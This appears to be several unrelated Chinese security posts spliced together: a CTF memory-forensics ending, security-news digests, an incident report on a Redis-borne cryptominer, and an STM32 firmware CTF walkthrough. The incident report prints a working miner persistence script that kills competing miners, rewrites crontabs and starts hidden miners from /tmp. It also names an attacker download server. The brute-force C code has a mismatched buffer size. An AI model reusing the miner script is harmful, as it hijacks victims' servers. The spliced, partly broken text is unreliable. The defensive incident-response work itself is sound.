all global symbols  functions  data    Timestamp:        Thu Apr 20 11:33:18 2017 (58F82BFE)    CheckSum:         0000E4F8    ImageSize:        0000E000    Translations:     0000.04b0 0000.04e4 0409.04b0 0409.04e4    Information from resource tables: 尝试寻找： C:\Users\Administrator\Desktop\stolen.dll 发现没有。。。 在内存中也没有数据，因为还没映射 那么我们就查看整个内存空间布局，看看能不能找到相应的映射数据，（在dll对应的范围内） !vadump !vadump 是 WinDbg 调试器中的一个命令，用于显示虚拟地址空间 (Virtual Address Space) 的详细信息。 该命令将输出当前进程的虚拟地址空间中每个 VAD（虚拟地址描述符）的信息。 VAD 是操作系统内核用于管理进程虚拟内存的数据结构之一。 通过使用 !vadump 命令，可以查看每个 VAD 的起始地址、结束地址、保护标志、镜像文件名等信息。 BaseAddress: 10001000 RegionSize:  000062f4 flag如下： flag{acaa16770db76c1ffb9cee51c3cabfcf} ‍

1、伊朗OilRig组织部署3个新的恶意软件下载程序 https://www.welivesecurity.com/en/eset-research/oilrig-persistent-attacks-cloud-service-powered-downloaders/ 伊朗国家资助的威胁组织OilRig在 2022 年部署了三种不同的下载器恶意软件，以维持对位于以色列的受害者组织的持续访问。斯洛伐克网络安全公司 ESET 将这三个新下载程序命名为 ODAgent、OilCheck 和 OilBooster。这些攻击还涉及使用名为 SampleCheck5000（或 SC5k）的已知 OilRig 下载程序的更新版本。通过使用知名云服务提供商进 2、谷歌使用Clang Sanitizers保护安卓用户免受蜂窝基带漏洞的影响 https://security.googleblog.com/2023/12/hardening-cellular-basebands-in-android.html 谷歌强调Clang Sanitizers在强化移动基带安全性方面发挥的作用安卓操作系统，并防止特定类型的漏洞。这包括 Integer Overflow Sanitizer (IntSan) 和 BoundsSanitizer (BoundSan)，两者都是 UndefinedBehaviorSanitizer (UBSan) 工具的一部分旨在捕获程序执行期间的各种未定义行为。它们与架构无关，适合裸机部署，并且应该在现有的 C 3、美国核研究实验室证实数据泄露影响超过四万条个人信息 https://apps.web.maine.gov/online/aeviewer/ME/40/ff925db5-9987-4a47-a5bc-a89c94f794f5.shtml 爱达荷国家实验室 (INL) 证实，攻击者上个月突破其基于云的 Oracle HCM HR 管理平台后，窃取了超过 45000 人的个人信息。INL 是美国能源部 (DOE) 17 个国家实验室之一，拥有 6,100 名研究人员和支持人员，从事国家安全和核研究。11 月 20 日，确认发生“网络安全数据泄露”事件。一天前，该事件影响了其异地 Oracle HCM 系统。作为正在进行的联合调查的一部分，CISA 4、新型NKAbuse恶意软件滥用NKN区块链进行隐秘通信 https://securelist.com/unveiling-nkabuse/111512/ 一种新的基于 Go 的多平台恶意软件被识别为“NKAbuse”是第一个滥用 NKN（新型网络）技术进行数据交换的恶意软件，使其成为一种隐形威胁。NKN 是一种相对较新的去中心化点对点网络协议，利用区块链技术来管理资源并维护安全透明的网络运营模型。NKN 的目标之一是优化整个网络的数据传输速度和延迟，这可以通过计算有效的数据包传输路径来实现。个人可以通过运行节点来参与NKN网络，类似于Tor网络，目前大约有60710个节点。 5、研究人员披露针对985个银行应用的10个新型安卓银行木马 https://www.zimperium.com/resources/zimperiums-2023-mobile-banking-heists-report-finds-29-malware-families-targeted-1800-banking-apps-across-61-countries-in-the-last-year/ 今年出现了 10 个新的 Android 银行恶意软件家族，这些恶意软件家族共同针对来自 61 个国家/地区的金融机构的 985 个银行和金融科技/交易应用程序。银行木马是一种恶意软件，通过窃取凭证和会话 cookie、绕过 2FA 保护、有时甚至自动执 6、Discord为所有用户添加了安全密钥支持以增强安全性 https://www.bleepingcomputer.com/news/security/discord-adds-security-key-support-for-all-users-to-enhance-security/ Discord 已为平台上的所有帐户提供安全密钥多重身份验证 (MFA)，为其 5 亿多注册用户带来显着的安全和反网络钓鱼优势。这家热门社交平台于 2023 年 8 月首次强调了使用 WebAuthn 安全密钥的好处，当时它为其员工推出了额外的帐户保护。Discord 现已为所有 Discord 用户带来了 WebAuthn 功能，允许用户替换依赖基于时间的一次性 7、研究人员披露QR网络钓鱼可导致Microsoft 365帐户被盗 https://www.secureworks.com/blog/qr-phishing-leads-to-microsoft-365-account-compromise 事件响应人员调查了源自包含 PDF 附件的网络钓鱼电子邮件的网络入侵。该 PDF 包含一个 QR 码，可将收件人引导至星际文件系统 (IPFS) 网关上托管的恶意内容。使用此网关可以让威胁行为者节省与托管自己的基础设施相关的成本和精力，并使执法部门难以取缔恶意内容。使用移动设备扫描二维码会将受害者引导至特定 URL，该 URL 会窃取会话令牌并重定向到 ipfs 。 io 网关托管恶意登录页面以获取 Microsoft 8、研究人员披露UNC2975恶意广告部署后门活动 https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors 研究人员发现了一场 UNC2975 恶意广告活动，该活动宣传以无人认领资金为主题的恶意网站。该活动至少可以追溯到 2023 年 6 月 19 日，滥用搜索引擎流量并利用恶意广告影响多个组织，导致 DANABOT 和 DARKGATE 后门的传播。在这次 UNC2975 活动中，恶意网站传播了 PAPERDROP 和 PAPERTEAR 下载器恶意软件，最终导致 DANABOT 和 DARKGATE 后门恶意软件。 9、攻击者利用公开的漏洞利用代码针对Apache Struts漏洞发起攻击 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-apache-struts-flaw-using-public-poc/ 黑客正试图利用 Apache Struts 中最近修复的一个严重漏洞 (CVE-2023-50164)，该漏洞会导致远程代码执行，从而进行依赖公开可用的概念验证漏洞利用代码的攻击。攻击者似乎才刚刚开始，该平台的研究人员观察到少数 IP 地址正在进行利用尝试。Apache Struts 是一个开源 Web 应用程序框架，旨在简化 Java EE Web 应用程序的开 10、卡夫亨氏回应黑客攻击事件称其系统正常运行 https://www.bleepingcomputer.com/news/security/kraft-heinz-investigates-hack-claims-says-systems-operating-normally/ 卡夫亨氏已确认他们的系统运行正常，并且没有证据表明他们在勒索组织将其列在数据泄露网站上后遭到破坏。卡夫亨氏是全球最大的食品和饮料公司之一，在 40 个国家/地区拥有超过 37000 名员工。该公司拥有众多知名品牌，包括 Oscar Mayer、Kool-Aid、Philadelphia、Lunchables、Maxwell House 等。在 Snatch 勒索 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

ps：因为项目保密的原因部分的截图是自己在本地的环境复现。 1. 起因 客户打电话过来说，公司web服务异常卡顿。起初以为是web服务缓存过多导致，重启几次无果后觉得可能是受到了攻击。起初以为是ddos攻击，然后去查看web服务器管理面板时发现网络链接很少，但是cpu占用高达99%，于是便怀疑是中了挖矿病毒。 2.排查可疑进程 首先发现cpu占用率过高，初步怀疑是挖矿病毒。于是上ssh开始排查 使用top命令查看进程占用列表。发现并没有占用过高的程序，但是查询cpu占用率确实是99%。怀疑是隐藏了linux进程。 以为是做了进程隐藏，于是写了个python脚本遍历/proc目录。/proc目录是一个虚拟文件系统，用于提供有关系统内核和运行进程的信息。该目录中包含一系列以数字命名的子目录，每个子目录代表一个正在运行的进程。在这些子目录中，可以访问有关进程状态、内存使用情况、打开的文件列表等信息。 该脚本遍历proc目录，查询ps aux不显示的进程id，然后显示打印出来。 import os def get_max_pid():    pid_list = [int(pid) for pid in os.listdir('/proc') if pid.isdigit()]    return str(max(pid_list)) def get_existing_process_ids(max_pid):    process_ids = []    for pid in range(1, int(max_pid) + 1):        if os.path.exists('/proc/' + str(pid)):            process_ids.append(str(pid))    return process_ids def get_ps_aux_process_ids():    process_ids = []    output = os.popen('ps aux').read()    lines = output.split('n')    for line in lines[1:]:        if line.strip() != '':            pid = line.split()[1]            process_ids.append(pid)    return process_ids max_pid = get_max_pid() existing_process_ids = get_existing_process_ids(max_pid) ps_aux_process_ids = get_ps_aux_process_ids() for pid in existing_process_ids:    if pid not in ps_aux_process_ids:        print('Hidden PID {}'.format(pid)) emmmm, 但是效果不是很理想，有一大部分进程都是僵尸进程。 然后一个一个排查后效果不佳，并无发现什么可疑进程。 3 排查网络链接 于是打算从网络链接中入手，使用netstat-antp进行排查。发现有进程在链接47.130.146.28这个ip地址，然后拿这个ip地址反查域名。 发现是绑定的log.softgoldinformation.com这个域名。 然后搜索这个域名，发现之前也有人排查过了。 然后发现其实还有其他ip这里就不一一截图了。moneroocean，xmrig，kdevtmpfsi，mysqlserver等病毒基本上都有在链接。（服务器基本上已经中了n种病毒了。基本上与各种矿池都有链接。） 然后协商客户运维，设置只允许服务器访问国内ip地址，这一步主要是为了能通畅的链接ssh。因为挖矿病毒一般都是挖取xmr，xmr使用的基本上都是cpu，在挖矿进程链接不了矿池的情况下通常都不会产生cpu占用。果然禁止服务器出网后，cpu占用率就下来了。（也是为了防止服务器继续链接挖矿者的c2） 4 寻找漏洞 问过客户服务器有装什么软件，然后说是为了方便做web数据库的缓存，半个月之前装了redis。 使用ps aux|grep redis查看redis端口。 尝试空密码链接成功。基本确定入口点是redis。 5 补救措施 发现基本已经在跑着几个挖矿的病毒了。这里不确定能不能把后门排查完，只能和客户沟通说先排查一遍看看。（因为挖矿木马一般都会有后门，在清理挖矿程序后，后门会自动检查挖矿程序是否运行，如果不运行的话会重新下载一个挖矿程序然后再次运行。所以在完全清除挖矿程序后一段时间内，cpu占用率不飙升就可以说明清理成功。反之则说明挖矿病毒并未清理成功。） 首先查看一下定时任务。 发现并无异常。 cat /etc/crontab 然后查看tmp目录，发现有sh文件，这里抽取一个sh来分析，基本上/tmp出现这种都可以确定服务器被挖矿了。同理的还有/var/tmp目录。 ls -la /tmp 随便打开一个配置文件就能发现，攻击者的矿池地址和钱包地址。这种情况基本把tmp目录全部清除即可。 下面是一个solr的挖矿病毒脚本，这里只是kill掉了挖矿同行的进程和定时任务。 #!/bin/sh export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin while [ 1 ] do    killall /tmp/*    killall /var/tmp/*   crontab -l | sed '/195.3.146.118/d' | crontab -   crontab -l | sed '/cf.sh/d' | crontab -   crontab -l | sed '/xms/d' | crontab -   crontab -l | sed '/kwork.sh/d' | crontab -   crontab -l | sed '/cyberium/d' | crontab -   crontab -l | sed '/newdat/d' | crontab -    rm -f /tmp/*    ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'dbused' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'urlopen' | awk '{print $2}' | xargs -I % kill -9 %   pgrep JavaUpdate | xargs -I % kill -9 %   pgrep kinsing | xargs -I % kill -9 %   pgrep donate | xargs -I % kill -9 %   pgrep kdevtmpfsi | xargs -I % kill -9 %   pgrep trace | xargs -I % kill -9 %   pgrep sysupdate | xargs -I % kill -9 %   pgrep mysqlserver | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'trace' | awk '{print $2}' | xargs -I % kill -9 %   pkill xmrig   pkill sysupdate   pkill sysguard   pkill kthreaddk   pkill networkservice   pkill kdevtmpfsi   pkill watchbog    p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')    name=""$p    if [ -z "$name" ]    then       pkill solrd        ps aux | grep -v grep | grep -v 'java|redis|weblogic|solr|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|aux|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %       nohup /tmp/.solr/solrd &>>/dev/null &        sleep 30       nohup /tmp/.solr/genshin &>>/dev/null &        sleep 30    else         :    fi done • 查看/etc/passwd 是否有恶意用户 cat /etc/passwd 查看ssh是否有后门用户 (因为是redis的洞 很有可能会写入sshkey) ls -la /root/.ssh/ 然后用clamscan扫描一遍 clamscan -r / 设置redis密码登录。（这一步是由客户人员配置） 然后删除tmp目录下的脚本文件 rm -rf /tmp/*.sh 6 脚本分析 这里抽取其中的一个sh脚本讲一下挖矿病毒逻辑，因为脚本较大，所以这里是抽取部分代码过一遍逻辑，实际上常见的挖矿病毒脚本基本都差不多是一个逻辑，所以这里抽取了一个。 首先脚本的逻辑是从kill掉其他挖矿同行进程开始 然后写了一个定时任务 然后判断目标系统位数，到http://94.103.87.71/去下载病毒程序 这也就是最终的病毒文件 果不其然 最后是自动清理本身 总结 这次事故主要是因为开发人员不懂安全，直接开放redis数据库在公网并且不设置登录密码。虽然是内网服务器但是万幸做好了隔离。不然挖矿病毒肯定会在内网进行传播。 ps：听说客户之后去问了开发小哥，开发小哥说随便在网上找的教程，教程上是这样配置的就直接复制粘贴上去。所以建议大家在配置东西的时候尽量去查一下文档。

1、OAuth应用程序用于自动化BEC和加密货币挖矿攻击 https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/ Microsoft警告称，出于经济动机的威胁行为者正在使用OAuth应用程序来自动执行BEC和网络钓鱼攻击、推送垃圾邮件以及部署虚拟机进行加密挖矿。OAuth（开放授权的缩写）是一种开放标准，用于通过基于令牌的身份验证和授权，根据用户定义的权限授予应用程序对服务器资源的安全委派访问权限，而无需提供凭据。微软威胁情报专家最近 2、戴尔敦促客户修补 PowerProtect 产品中的漏洞 https://www.securityweek.com/dell-urges-customers-to-patch-vulnerabilities-in-powerprotect-products/ 戴尔敦促其PowerProtect产品的客户查看新发布的安全公告并修补一系列潜在的严重漏洞。漏洞影响 PowerProtect Data Domain (DD) 系列设备，这些设备旨在帮助组织大规模保护、管理和恢复数据。 APEX Protect Storage、PowerProtect DD Management Center、PowerProtect DP 系列设备和 PowerProte 3、微软破坏了创建了 7.5 亿个欺诈帐户的网络犯罪服务Storm-1152 https://www.securityweek.com/microsoft-disrupts-cybercrime-service-that-created-750-million-fraudulent-accounts/ 微软周三宣布破坏 Storm-1152，这是一个网络犯罪即服务 (CaaS) 生态系统，该生态系统创建了 7.5 亿个欺诈性 Microsoft 帐户，以支持网络钓鱼、身份盗窃和其他计划。 4、GambleForce 使用 SQL 注入攻击窃取亚太地区公司的数据 https://www.securityweek.com/new-threat-actor-uses-sql-injection-attacks-to-steal-data-from-apac-companies/ 威胁追踪和情报公司 Group-IB 报道，自 9 月以来，一个新的威胁行为者已针对 8 个国家（主要位于亚太地区）的 24 个组织发起攻击。名为 GambleForce，该黑客组织一直使用 SQL 注入并利用赌博组织的内容管理系统 (CMS) 中的漏洞、政府、零售和旅游部门，窃取敏感信息，包括用户凭证。该黑客组织完全依赖开源和其他公开可用的工具来进行初始访问、侦察和数据盗窃，并 5、Ubiquiti 用户声称可以访问其他人的设备 https://securityaffairs.com/155871/security/ubiquiti-wifi-products-issue.html Ubiquiti WiFi 产品的用户开始报告称，他们在登录自己的帐户时正在访问其他人的设备。 6、与俄罗斯有关的 APT29 针对 JETBRAINS TEAMCITY 服务器 https://securityaffairs.com/155846/apt/apt29-targeting-jetbrains-teamcity-servers.html 专家警告称，已观察到与俄罗斯有关的 APT29 组织以 JetBrains TeamCity 服务器为目标，以获取对目标网络的初始访问权限。利用了该缺陷CVE-2023 -42793 在 TeamCity 中执行多种恶意活动。 7、PyPI 存储库中发现 116 个恶意包可感染 Windows 和 Linux 系统 https://thehackernews.com/2023/12/116-malware-packages-found-on-pypi.html 网络安全研究人员在 Python 包索引 (PyPI) 存储库中发现了一组 116 个恶意包，这些包旨在通过自定义后门感染 Windows 和 Linux 系统。最终的有效负载是臭名昭著的W4SP Stealer的变体，或者是用于窃取加密货币的简单剪贴板监视器，或两者兼而有之。 8、索尼正在调查 Insomniac 子部门的勒索软件攻击事件 https://therecord.media/sony-investigating-ransomware-insomniac-games 索尼子公司 Insomniac Games 目前正在调查 Rhysida 团伙发起的勒索软件攻击事件，该团伙过去曾针对多个政府机构和医疗机构发起勒索软件攻击。 9、法国警方逮捕与 Hive 勒索软件有关的俄罗斯籍嫌疑人 https://www.bleepingcomputer.com/news/security/french-police-arrests-russian-suspect-linked-to-hive-ransomware/ 法国警方在巴黎逮捕了一名涉嫌帮助 Hive 勒索软件团伙洗钱的俄罗斯公民。嫌疑人因与从可疑来源接收数百万美元的数字钱包相关联而被捕。 10、2023 年 微软共修补了 909 个漏洞 http://www.anquan419.com/knews/24/6429.html Tenable Research 团队统计了 2023 年微软星期二补丁数据指出，2023 年微软共修补了 909 个漏洞，比2022 年的 917 个漏洞略微下降 0.87%。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

题目给的是bin文件，基本上就是需要我们手动修复的固件逆向。 如果给的是hex文件，我们可能需要使用MKD进行动态调试 主要还是以做题为目的 详细的可以去看文档：https://pdf1.alldatasheet.com/datasheet-pdf/view/201596/STMICROELECTRONICS/STM32F103C8T6.html SVD文件下载：https://github.com/posborne/cmsis-svd 本文参考了网上多篇文章，最终汇总在一篇，对这道新的STM32题进行解题。 IDA分析设置 1、基础设置 STM32主要信息： 内核：ARM32位Cortex-M3 CPU ARM Little-endian Cortex-M架构属于ARMv7-M IDA32位打开 ARM little-endian ‍ 点击ok之后进入 flash的映射地址是 0x08000000 ~ 0x0807ffff (512KB) flash就是我们装代码的地方，也是STM32入口 下面这张图来自STM32中文参考手册 从这张表中，可以了解的信息是，在偏移4的位置存储的是RESET，并且是固定的。 Reset就是充电就会执行并进入的地方，因此将其当做固件入口 在IDA偏移为4的地方，按下“D”键进行转换 得到了RESET的地址：0x80004D1 可以看到为奇数，说明是thumb指令 按下 "G" 键进行跳转 然后神奇的一幕发生了 自动识别了很多函数 其实这没有固定的套路，我们跟踪跳转，一步一步的分析，最终会到达关键步骤 分析函数 ：sub_8000260 发现爆红了，需要我们手动添加一些段 Flash Memory: 0x8000000 ~ 0x801FFFF (128K) SRAM: 0x20000000 ~ 0x20004FFF (20K) Peripherals: 0x40000000 ~ 0x40023400 ‍ 2、添加段-SRAM 单片机内存被总分为flash(rom)和sram（ram），flash里面的数据掉电可保存，sram中的数据掉电就丢失，sram的执行速度要快于flash，flash容量大于sram 单片机的程序存储分为code(代码存储区)、RO-data(只读数据存储区)、RW-data(读写数据存储区) 和 ZI-data(零初始化数据区) Flash 存储 code和RO-data Sram 存储 RW-data 和ZI-data 所以，SRAM段需要我们自己添加 [0x20000000,0x2000ffff] SRAM: 0x20000000 ~ 0x20004FFF (20K) 存放程序动态执行时的变量 ‍ ‍3、添加段-Peripherals Peripherals: 0x40000000 ~ 0x400234ff    #这里还是改为了0x400234ff 而不是 0x40023400 在实战中发现多有多余的爆红，因此范围扩大总没错 外设寄存器的映射地址，程序通过读写这些内存地址实现对外围设备的控制 Peripherals 段中包含了我们要了解的寄存器 ‍ 4、恢复中断向量表 地址0x8000000 -0x80000eb 存储了中断向量表的相关信息 使用python脚本，主要功能是删除旧的分析，添加dword类型分析 for i in range(0x8000000,0x80000eb,1): del_items(i) for i in range(0x8000000,0x80000eb,4): create_dword(i) print("ok") 可以看到均已恢复 修复完成后，发现了很多重复的地址，比如：0x8000519 这些函数并没有定义 跳转过去，将其全部生成对应的函数，使用（P 键） 官方图： ‍ 5、恢复符号 bindiff来恢复符号表 如果有闲工夫或者是对stm32的开发非常上手，就可以自己写一个demo，尽可能多的使用到各种库函数，然后编译出一个axf文件。我这里的话，由于好久没有用stm32了，开发起来有些生疏，所以就不自己手写了，我选择捡现成的项目，编译出axf文件 可以多选几个例程，能涵盖更多的库函数，将这些axf文件用IDA打开，然后生成idb文件。然后在我们的目标bin文件中，使用bindiff加载idb文件。 网上随便找一个，下载axf文件 选择一个idb文件，然后会出现这样一个比较界面： 选取similarity大的函数导入到bin文件中 导入之后实际上就能恢复大部分的函数名了。 ‍ ‍6、恢复外设 导入SVD文件，恢复外设结构 在IDA7.5以后，就自带SVD文件加载插件了，如下图： 打开之后如下： 我们可以自行下载相应的SVD文件，或者加载GitHub上的仓库，我这里选择自行下载然后在本地加载。 下载链接是这个： assets/stm32-svd-main-20231209212159-rbquvf5.zip选中想要加载的svd文件之后，IDA就会自动恢复bin文件中的外设结构，体现在伪代码中就是这样： （在这题中好像没什么用） ‍ ‍7、解题 基本上做完上面的操作后 STM32就能看了 进入main函数 继续分析 题目说的是要找key 但是发现Key没有值。。。也就是说要么动调要么爆破，给了密文，就差了key 因此写出解密脚本 先转换一下 int main() {      int  v19[8] = { 0 };    v19[0] = 0xF4DD0F64;    v19[1] = 0x5173B9F8;    v19[2] = 0xC7D238B2;    v19[3] = 0x9B9FCA8;    v19[4] = 0x286D3C51;    v19[5] = 0x429DE399;    v19[6] = 0x8084307B;    LOWORD(v19[7]) = 0x9175;    for (size_t i = 0; i < 8; i++)   {        for (size_t j = 0; j < 4; j++)       {            printf("%02x ", (v19[i] >> 8 * j)&0xff);       }   }    return 0; } ‍写出解密脚本： from itertools import product from Crypto.Cipher import ARC4 xorkey ="flag{tH14.l4_F@kKkEeeE---f41g}" enc = bytearray([0x64,0x0f,0xdd,0xf4,0xf8,0xb9,0x73,0x51,0xb2,0x38,0xd2,0xc7,0xa8,0xfc,0xb9,0x09,0x51,0x3c,0x6d,0x28,0x99,0xe3,0x9d,0x42,0x7b,0x30,0x84,0x80,0x75,0x91]) l = list(range(0x20,0x7f)) for k in product(l, repeat=4):    key = bytearray(k)    res = ARC4.new(key).decrypt(xorkey.encode())    if res == enc:        print('get')        print(key)        exit(0) 使用C语言爆破会更快 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <openssl/arc4.h> #define XOR_KEY "flag{tH14.l4_F@kKkEeeE---f41g}" #define ENC_SIZE 29 int main() {    uint8_t enc[ENC_SIZE] = {0x64, 0x0f, 0xdd, 0xf4, 0xf8, 0xb9, 0x73, 0x51, 0xb2, 0x38, 0xd2, 0xc7, 0xa8, 0xfc, 0xb9, 0x09, 0x51, 0x3c, 0x6d, 0x28, 0x99, 0xe3, 0x9d, 0x42, 0x7b, 0x30, 0x84, 0x80, 0x75, 0x91};    int l[] = {0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f,               0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f,               0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f,               0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5a, 0x5b, 0x5c, 0x5d, 0x5e, 0x5f,               0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f,               0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f};    int l_size = sizeof(l) / sizeof(int);    uint8_t key[4];    uint8_t dec[ENC_SIZE];    for (int i = 0; i < l_size; i++) {        for (int j = 0; j < l_size; j++) {            for (int k = 0; k < l_size; k++) {                for (int m = 0; m < l_size; m++) {                    key[0] = l[i];                    key[1] = l[j];                    key[2] = l[k];                    key[3] = l[m];                    ARC4_CTX ctx;                    ARC4_set_key(&ctx, 4, key);                    ARC4(&ctx, ENC_SIZE, enc, dec);                    if (memcmp(dec, XOR_KEY, ENC_SIZE) == 0) {                        printf("get\n");                        printf("%c%c%c%c\n", key[0], key[1], key[2], key[3]);                        exit(0);                   }               }           }       }   }    return 0; } 爆破出秘钥： d4@d